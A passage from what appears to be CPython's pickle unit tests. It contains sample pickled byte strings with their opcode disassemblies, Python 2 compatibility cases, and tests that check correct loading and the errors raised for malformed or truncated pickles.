b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopy_reg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06c__builtin__\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL '__builtin__ complex'
38: q BINPUT 1
40: ( MARK
41: G BINFLOAT 3.0
50: G BINFLOAT 0.0
59: t TUPLE (MARK at 40)
60: q BINPUT 2
62: R REDUCE
63: q BINPUT 3
65: K BININT1 1
67: J BININT -1
72: K BININT1 255
74: J BININT -255
79: J BININT -256
84: M BININT2 65535
87: J BININT -65535
92: J BININT -65536
97: J BININT 2147483647
102: J BININT -2147483647
107: J BININT -2147483648
112: ( MARK
113: X BINUNICODE 'abc'
121: q BINPUT 4
123: h BINGET 4
125: c GLOBAL 'copy_reg _reconstructor'
150: q BINPUT 5
152: ( MARK
153: c GLOBAL '__main__ C'
165: q BINPUT 6
167: c GLOBAL '__builtin__ object'
187: q BINPUT 7
189: N NONE
190: t TUPLE (MARK at 152)
191: q BINPUT 8
193: R REDUCE
194: q BINPUT 9
196: } EMPTY_DICT
197: q BINPUT 10
199: ( MARK
200: X BINUNICODE 'foo'
208: q BINPUT 11
210: K BININT1 1
212: X BINUNICODE 'bar'
220: q BINPUT 12
222: K BININT1 2
224: u SETITEMS (MARK at 199)
225: b BUILD
226: h BINGET 9
228: t TUPLE (MARK at 112)
229: q BINPUT 13
231: h BINGET 13
233: K BININT1 5
235: e APPENDS (MARK at 3)
236: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'__builtin__\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL '__builtin__ complex'
40: q BINPUT 1
42: G BINFLOAT 3.0
51: G BINFLOAT 0.0
60: \x86 TUPLE2
61: q BINPUT 2
63: R REDUCE
64: q BINPUT 3
66: K BININT1 1
68: J BININT -1
73: K BININT1 255
75: J BININT -255
80: J BININT -256
85: M BININT2 65535
88: J BININT -65535
93: J BININT -65536
98: J BININT 2147483647
103: J BININT -2147483647
108: J BININT -2147483648
113: ( MARK
114: X BINUNICODE 'abc'
122: q BINPUT 4
124: h BINGET 4
126: c GLOBAL '__main__ C'
138: q BINPUT 5
140: ) EMPTY_TUPLE
141: \x81 NEWOBJ
142: q BINPUT 6
144: } EMPTY_DICT
145: q BINPUT 7
147: ( MARK
148: X BINUNICODE 'foo'
156: q BINPUT 8
158: K BININT1 1
160: X BINUNICODE 'bar'
168: q BINPUT 9
170: K BININT1 2
172: u SETITEMS (MARK at 147)
173: b BUILD
174: h BINGET 6
176: t TUPLE (MARK at 113)
177: q BINPUT 10
179: h BINGET 10
181: K BININT1 5
183: e APPENDS (MARK at 5)
184: . STOP
highest protocol among opcodes = 2
"""
DATA3 = (
b'\x80\x03]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01G'
b'@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00\x86q\x02'
b'Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ\x00\xff'
b'\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff\xff\x7f'
b'J\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00abcq'
b'\x04h\x04c__main__\nC\nq\x05)\x81q'
b'\x06}q\x07(X\x03\x00\x00\x00barq\x08K\x02X\x03\x00'
b'\x00\x00fooq\tK\x01ubh\x06tq\nh\nK\x05'
b'e.'
)
# Disassembly of DATA3
DATA3_DIS = """\
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'bar'
153: q BINPUT 8
155: K BININT1 2
157: X BINUNICODE 'foo'
165: q BINPUT 9
167: K BININT1 1
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
DATA4 = (
b'\x80\x04\x95\xa8\x00\x00\x00\x00\x00\x00\x00]\x94(K\x00K\x01G@'
b'\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07'
b'complex\x94\x93\x94G@\x08\x00\x00\x00\x00\x00\x00G'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x86\x94R\x94K\x01J\xff\xff\xff\xffK'
b'\xffJ\x01\xff\xff\xffJ\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ'
b'\x00\x00\xff\xffJ\xff\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80('
b'\x8c\x03abc\x94h\x06\x8c\x08__main__\x94\x8c'
b'\x01C\x94\x93\x94)\x81\x94}\x94(\x8c\x03bar\x94K\x02\x8c'
b'\x03foo\x94K\x01ubh\nt\x94h\x0eK\x05e.'
)
# Disassembly of DATA4
DATA4_DIS = """\
0: \x80 PROTO 4
2: \x95 FRAME 168
11: ] EMPTY_LIST
12: \x94 MEMOIZE
13: ( MARK
14: K BININT1 0
16: K BININT1 1
18: G BINFLOAT 2.0
27: \x8c SHORT_BINUNICODE 'builtins'
37: \x94 MEMOIZE
38: \x8c SHORT_BINUNICODE 'complex'
47: \x94 MEMOIZE
48: \x93 STACK_GLOBAL
49: \x94 MEMOIZE
50: G BINFLOAT 3.0
59: G BINFLOAT 0.0
68: \x86 TUPLE2
69: \x94 MEMOIZE
70: R REDUCE
71: \x94 MEMOIZE
72: K BININT1 1
74: J BININT -1
79: K BININT1 255
81: J BININT -255
86: J BININT -256
91: M BININT2 65535
94: J BININT -65535
99: J BININT -65536
104: J BININT 2147483647
109: J BININT -2147483647
114: J BININT -2147483648
119: ( MARK
120: \x8c SHORT_BINUNICODE 'abc'
125: \x94 MEMOIZE
126: h BINGET 6
128: \x8c SHORT_BINUNICODE '__main__'
138: \x94 MEMOIZE
139: \x8c SHORT_BINUNICODE 'C'
142: \x94 MEMOIZE
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE
145: ) EMPTY_TUPLE
146: \x81 NEWOBJ
147: \x94 MEMOIZE
148: } EMPTY_DICT
149: \x94 MEMOIZE
150: ( MARK
151: \x8c SHORT_BINUNICODE 'bar'
156: \x94 MEMOIZE
157: K BININT1 2
159: \x8c SHORT_BINUNICODE 'foo'
164: \x94 MEMOIZE
165: K BININT1 1
167: u SETITEMS (MARK at 150)
168: b BUILD
169: h BINGET 10
171: t TUPLE (MARK at 119)
172: \x94 MEMOIZE
173: h BINGET 14
175: K BININT1 5
177: e APPENDS (MARK at 13)
178: . STOP
highest protocol among opcodes = 4
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA_SET = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA_XRANGE = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA_COOKIE = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA_SET2 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
python2_exceptions_without_args = (
ArithmeticError,
AssertionError,
AttributeError,
BaseException,
BufferError,
BytesWarning,
DeprecationWarning,
EOFError,
EnvironmentError,
Exception,
FloatingPointError,
FutureWarning,
GeneratorExit,
IOError,
ImportError,
ImportWarning,
IndentationError,
IndexError,
KeyError,
KeyboardInterrupt,
LookupError,
MemoryError,
NameError,
NotImplementedError,
OSError,
OverflowError,
PendingDeprecationWarning,
ReferenceError,
RuntimeError,
RuntimeWarning,
# StandardError is gone in Python 3, we map it to Exception
StopIteration,
SyntaxError,
SyntaxWarning,
SystemError,
SystemExit,
TabError,
TypeError,
UnboundLocalError,
UnicodeError,
UnicodeWarning,
UserWarning,
ValueError,
Warning,
ZeroDivisionError,
)
exception_pickle = b'\x80\x02cexceptions\n?\nq\x00)Rq\x01.'
# UnicodeEncodeError object pickled from 2.x with protocol 2
DATA_UEERR = (b'\x80\x02cexceptions\nUnicodeEncodeError\n'
b'q\x00(U\x05asciiq\x01X\x03\x00\x00\x00fooq\x02K\x00K\x01'
b'U\x03badq\x03tq\x04Rq\x05.')
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractUnpickleTests(unittest.TestCase):
# Subclass must define self.loads.
_testdata = create_data()
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_unpickling_error(self, errors, data):
with self.subTest(data=data), \
self.assertRaises(errors):
try:
self.loads(data)
except BaseException as exc:
if support.verbose > 1:
print('%-32r - %s: %s' %
(data, exc.__class__.__name__, exc))
raise
def test_load_from_data0(self):
self.assert_is_copy(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assert_is_copy(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assert_is_copy(self._testdata, self.loads(DATA2))
def test_load_from_data3(self):
self.assert_is_copy(self._testdata, self.loads(DATA3))
def test_load_from_data4(self):
self.assert_is_copy(self._testdata, self.loads(DATA4))
def test_load_classic_instance(self):
# See issue5180. Test loading 2.x pickles that
# contain an instance of old style class.
for X, args in [(C, ()), (D, ('x',)), (E, ())]:
xname = X.__name__.encode('ascii')
# Protocol 0 (text mode pickle):
"""
0: ( MARK
1: i INST '__main__ X' (MARK at 0)
13: p PUT 0
16: ( MARK
17: d DICT (MARK at 16)
18: p PUT 1
21: b BUILD
22: . STOP
"""
pickle0 = (b"(i__main__\n"
b"X\n"
b"p0\n"
b"(dp1\nb.").replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle0))
# Protocol 1 (binary mode pickle)
"""
0: ( MARK
1: c GLOBAL '__main__ X'
13: q BINPUT 0
15: o OBJ (MARK at 0)
16: q BINPUT 1
18: } EMPTY_DICT
19: q BINPUT 2
21: b BUILD
22: . STOP
"""
pickle1 = (b'(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle1))
# Protocol 2 (pickle2 = b'\x80\x02' + pickle1)
"""
0: \x80 PROTO 2
2: ( MARK
3: c GLOBAL '__main__ X'
15: q BINPUT 0
17: o OBJ (MARK at 2)
18: q BINPUT 1
20: } EMPTY_DICT
21: q BINPUT 2
23: b BUILD
24: . STOP
"""
pickle2 = (b'\x80\x02(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle2))
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assert_is_copy(maxint64, got)
# Also try with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.check_unpickling_error(ValueError, data)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA_SET)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA_XRANGE)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA_COOKIE)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "value")
# Exception objects without arguments pickled from 2.x with protocol 2
for exc in python2_exceptions_without_args:
data = exception_pickle.replace(b'?', exc.__name__.encode("ascii"))
loaded = self.loads(data)
self.assertIs(type(loaded), exc)
# StandardError is mapped to Exception, test that separately
loaded = self.loads(exception_pickle.replace(b'?', b'StandardError'))
self.assertIs(type(loaded), Exception)
loaded = self.loads(DATA_UEERR)
self.assertIs(type(loaded), UnicodeEncodeError)
self.assertEqual(loaded.object, "foo")
self.assertEqual(loaded.encoding, "ascii")
self.assertEqual(loaded.start, 0)
self.assertEqual(loaded.end, 1)
self.assertEqual(loaded.reason, "bad")
def test_load_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('a\x00\xa0', protocol=0)
self.assertEqual(self.loads(b"S'a\\x00\\xa0'\n.",
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=1)
self.assertEqual(self.loads(b'U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=2)
self.assertEqual(self.loads(b'\x80\x02U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
def test_load_python2_unicode_as_str(self):
# From Python 2: pickle.dumps(u'π', protocol=0)
self.assertEqual(self.loads(b'V\\u03c0\n.',
encoding='bytes'), 'π')
# From Python 2: pickle.dumps(u'π', protocol=1)
self.assertEqual(self.loads(b'X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
# From Python 2: pickle.dumps(u'π', protocol=2)
self.assertEqual(self.loads(b'\x80\x02X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
def test_load_long_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('x' * 300, protocol=1)
self.assertEqual(self.loads(pickle.BINSTRING +
struct.pack("<I", 300) +
b'x' * 300 + pickle.STOP,
encoding='bytes'), b'x' * 300)
def test_constants(self):
self.assertIsNone(self.loads(b'N.'))
self.assertIs(self.loads(b'\x88.'), True)
self.assertIs(self.loads(b'\x89.'), False)
self.assertIs(self.loads(b'I01\n.'), True)
self.assertIs(self.loads(b'I00\n.'), False)
def test_empty_bytestring(self):
# issue 11286
empty = self.loads(b'\x80\x03U\x00q\x00.', encoding='koi8-r')
self.assertEqual(empty, '')
def test_short_binbytes(self):
dumped = b'\x80\x03C\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binbytes(self):
dumped = b'\x80\x03B\x04\x00\x00\x00\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
@requires_32b
def test_negative_32b_binbytes(self):
# On 32-bit builds, a BINBYTES of 2**31 or more is refused
dumped = b'\x80\x03B\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_negative_32b_binunicode(self):
# On 32-bit builds, a BINUNICODE of 2**31 or more is refused
dumped = b'\x80\x03X\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_short_binunicode(self):
dumped = b'\x80\x04\x8c\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_misc_get(self):
self.check_unpickling_error(KeyError, b'g0\np0')
self.assert_is_copy([(100,), (100,)],
self.loads(b'((Kdtp0\nh\x00l.))'))
def test_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_bytearray8(self):
dumped = b'\x80\x05\x96\x03\x00\x00\x00\x00\x00\x00\x00xxx.'
self.assertEqual(self.loads(dumped), bytearray(b'xxx'))
@requires_32b
def test_large_32b_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_bytearray8(self):
dumped = b'\x80\x05\x96\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_get(self):
pickled = b'((lp100000\ng100000\nt.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_binget(self):
pickled = b'(]q\xffh\xfft.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_long_binget(self):
pickled = b'(]r\x00\x00\x01\x00j\x00\x00\x01\x00t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_dup(self):
pickled = b'((l2t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_negative_put(self):
# Issue #12847
dumped = b'Va\np-1\n.'
self.check_unpickling_error(ValueError, dumped)
@requires_32b
def test_negative_32b_binput(self):
# Issue #12847
dumped = b'\x80\x03X\x01\x00\x00\x00ar\xff\xff\xff\xff.'
self.check_unpickling_error(ValueError, dumped)
def test_badly_escaped_string(self):
self.check_unpickling_error(ValueError, b"S'\\'\n.")
def test_badly_quoted_string(self):
# Issue #17710
badpickles = [b"S'\n.",
b'S"\n.',
b'S\' \n.',
b'S" \n.',
b'S\'"\n.',
b'S"\'\n.',
b"S' ' \n.",
b'S" " \n.',
b"S ''\n.",
b'S ""\n.',
b'S \n.',
b'S\n.',
b'S.']
for p in badpickles:
self.check_unpickling_error(pickle.UnpicklingError, p)
def test_correctly_quoted_string(self):
goodpickles = [(b"S''\n.", ''),
(b'S""\n.', ''),
(b'S"\\n"\n.', '\n'),
(b"S'\\n'\n.", '\n')]
for p, expected in goodpickles:
self.assertEqual(self.loads(p), expected)
def test_frame_readline(self):
pickled = b'\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00I42\n.'
# 0: \x80 PROTO 4
# 2: \x95 FRAME 5
# 11: I INT 42
# 15: . STOP
self.assertEqual(self.loads(pickled), 42)
def test_compat_unpickle(self):
# xrange(1, 7)
pickled = b'\x80\x02c__builtin__\nxrange\nK\x01K\x07K\x01\x87R.'
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), range)
self.assertEqual(unpickled, range(1, 7))
self.assertEqual(list(unpickled), [1, 2, 3, 4, 5, 6])
# reduce
pickled = b'\x80\x02c__builtin__\nreduce\n.'
self.assertIs(self.loads(pickled), functools.reduce)
# whichdb.whichdb
pickled = b'\x80\x02cwhichdb\nwhichdb\n.'
self.assertIs(self.loads(pickled), dbm.whichdb)
# Exception(), StandardError()
for name in (b'Exception', b'StandardError'):
pickled = (b'\x80\x02cexceptions\n' + name + b'\nU\x03ugh\x85R.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), Exception)
self.assertEqual(str(unpickled), 'ugh')
# UserDict.UserDict({1: 2}), UserDict.IterableUserDict({1: 2})
for name in (b'UserDict', b'IterableUserDict'):
pickled = (b'\x80\x02(cUserDict\n' + name +
b'\no}U\x04data}K\x01K\x02ssb.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), collections.UserDict)
self.assertEqual(unpickled, collections.UserDict({1: 2}))
def test_bad_stack(self):
badpickles = [
b'.', # STOP
b'0', # POP
b'1', # POP_MARK
b'2', # DUP
b'(2',
b'R', # REDUCE
b')R',
b'a', # APPEND
b'Na',
b'b', # BUILD
b'Nb',
b'd', # DICT
b'e', # APPENDS
b'(e',
b'ibuiltins\nlist\n', # INST
b'l', # LIST
b'o', # OBJ
b'(o',
b'p1\n', # PUT
b'q\x00', # BINPUT
b'r\x00\x00\x00\x00', # LONG_BINPUT
b's', # SETITEM
b'Ns',
b'NNs',
b't', # TUPLE
b'u', # SETITEMS
b'(u',
b'}(Nu',
b'\x81', # NEWOBJ
b')\x81',
b'\x85', # TUPLE1
b'\x86', # TUPLE2
b'N\x86',
b'\x87', # TUPLE3
b'N\x87',
b'NN\x87',
b'\x90', # ADDITEMS
b'(\x90',
b'\x91', # FROZENSET
b'\x92', # NEWOBJ_EX
b')}\x92',
b'\x93', # STACK_GLOBAL
b'Vlist\n\x93',
b'\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_bad_mark(self):
badpickles = [
b'N(.', # STOP
b'N(2', # DUP
b'cbuiltins\nlist\n)(R', # REDUCE
b'cbuiltins\nlist\n()R',
b']N(a', # APPEND
# BUILD
b'cbuiltins\nValueError\n)R}(b',
b'cbuiltins\nValueError\n)R(}b',
b'(Nd', # DICT
b'N(p1\n', # PUT
b'N(q\x00', # BINPUT
b'N(r\x00\x00\x00\x00', # LONG_BINPUT
b'}NN(s', # SETITEM
b'}N(Ns',
b'}(NNs',
b'}((u', # SETITEMS
b'cbuiltins\nlist\n)(\x81', # NEWOBJ
b'cbuiltins\nlist\n()\x81',
b'N(\x85', # TUPLE1
b'NN(\x86', # TUPLE2
b'N(N\x86',
b'NNN(\x87', # TUPLE3
b'NN(N\x87',
b'N(NN\x87',
b']((\x90', # ADDITEMS
# NEWOBJ_EX
b'cbuiltins\nlist\n)}(\x92',
b'cbuiltins\nlist\n)(}\x92',
b'cbuiltins\nlist\n()}\x92',
# STACK_GLOBAL
b'Vbuiltins\n(Vlist\n\x93',
b'Vbuiltins\nVlist\n(\x93',
b'N(\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_truncated_data(self):
self.check_unpickling_error(EOFError, b'')
self.check_unpickling_error(EOFError, b'N')
badpickles = [
b'B', # BINBYTES
b'B\x03\x00\x00',
b'B\x03\x00\x00\x00',
b'B\x03\x00\x00\x00ab',
b'C', # SHORT_BINBYTES
b'C\x03',
b'C\x03ab',
b'F', # FLOAT
b'F0.0',
b'F0.00',
b'G', # BINFLOAT
b'G\x00\x00\x00\x00\x00\x00\x00',
b'I', # INT
b'I0',
b'J', # BININT
b'J\x00\x00\x00',
b'K', # BININT1
b'L', # LONG
b'L0',
b'L10',
b'L0L',
b'L10L',
b'M', # BININT2
b'M\x00',
# b'P', # PERSID
# b'Pabc',
b'S', # STRING
b"S'abc'",
b'T', # BINSTRING
b'T\x03\x00\x00',
b'T\x03\x00\x00\x00',
b'T\x03\x00\x00\x00ab',
b'U', # SHORT_BINSTRING
b'U\x03',
b'U\x03ab',
b'V', # UNICODE
b'Vabc',
b'X', # BINUNICODE
b'X\x03\x00\x00',
b'X\x03\x00\x00\x00',
b'X\x03\x00\x00\x00ab',
b'(c', # GLOBAL
b'(cbuiltins',
b'(cbuiltins\n',
b'(cbuiltins\nlist',
b'Ng', # GET
b'Ng0',
b'(i', # INST
b'(ibuiltins',
b'(ibuiltins\n',
b'(ibuiltins\nlist',
b'Nh', # BINGET
b'Nj', # LONG_BINGET
b'Nj\x00\x00\x00',
b'Np', # PUT
b'Np0',
b'Nq', # BINPUT
b'Nr', # LONG_BINPUT
b'Nr\x00\x00\x00',
b'\x80', # PROTO
b'\x82', # EXT1
b'\x83', # EXT2
b'\x84\x01',
b'\x84', # EXT4
b'\x84\x01\x00\x00',
b'\x8a', # LONG1
b'\x8b', # LONG4
b'\x8b\x00\x00\x00',
b'\x8c', # SHORT_BINUNICODE
b'\x8c\x03',
b'\x8c\x03ab',
b'\x8d', # BINUNICODE8
b'\x8d\x03\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x8e', # BINBYTES8
b'\x8e\x03\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x96', # BYTEARRAY8
b'\x96\x03\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x95', # FRAME
b'\x95\x02\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00N',
]
for p in badpickles:
self.check_unpickling_error(self.truncated_errors, p)
@reap_threads
def test_unpickle_module_race(self):
# https://bugs.python.org/issue34572
locker_module = dedent("""
import threading
barrier = threading.Barrier(2)
""")
locking_import_module = dedent("""
import locker
locker.barrier.wait()
class ToBeUnpickled(object):
pass
""")
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
with open(os.path.join(TESTFN, "locker.py"), "wb") as f:
f.write(locker_module.encode('utf-8'))
with open(os.path.join(TESTFN, "locking_import.py"), "wb") as f:
f.write(locking_import_module.encode('utf-8'))
self.addCleanup(forget, "locker")
self.addCleanup(forget, "locking_import")
import locker
pickle_bytes = (
b'\x80\x03clocking_import\nToBeUnpickled\nq\x00)\x81q\x01.')
# Then try to unpickle two of these simultaneously
# One of them will cause the module import, and we want it to block
# until the other one either:
# - fails (before the patch for this issue)
# - blocks on the import lock for the module, as it should
results = []
barrier = threading.Barrier(3)
def t():
# This ensures the threads have all started
# presumably barrier release is faster than thread startup
barrier.wait()
results.append(pickle.loads(pickle_bytes))
t1 = threading.Thread(target=t)
t2 = threading.Thread(target=t)
t1.start()
t2.start()
barrier.wait()
# could have delay here
locker.barrier.wait()
t1.join()
t2.join()
from locking_import import ToBeUnpickled
self.assertEqual(
[type(x) for x in results],
[ToBeUnpickled] * 2)
class AbstractPickleTests(unittest.TestCase):
# Subclass must define self.dumps, self.loads.
optimized = False
_testdata = AbstractUnpickleTests._testdata
def setUp(self):
pass
assert_is_copy = AbstractUnpickleTests.assert_is_copy
def test_misc(self):
# test various datatypes not tested by testdata
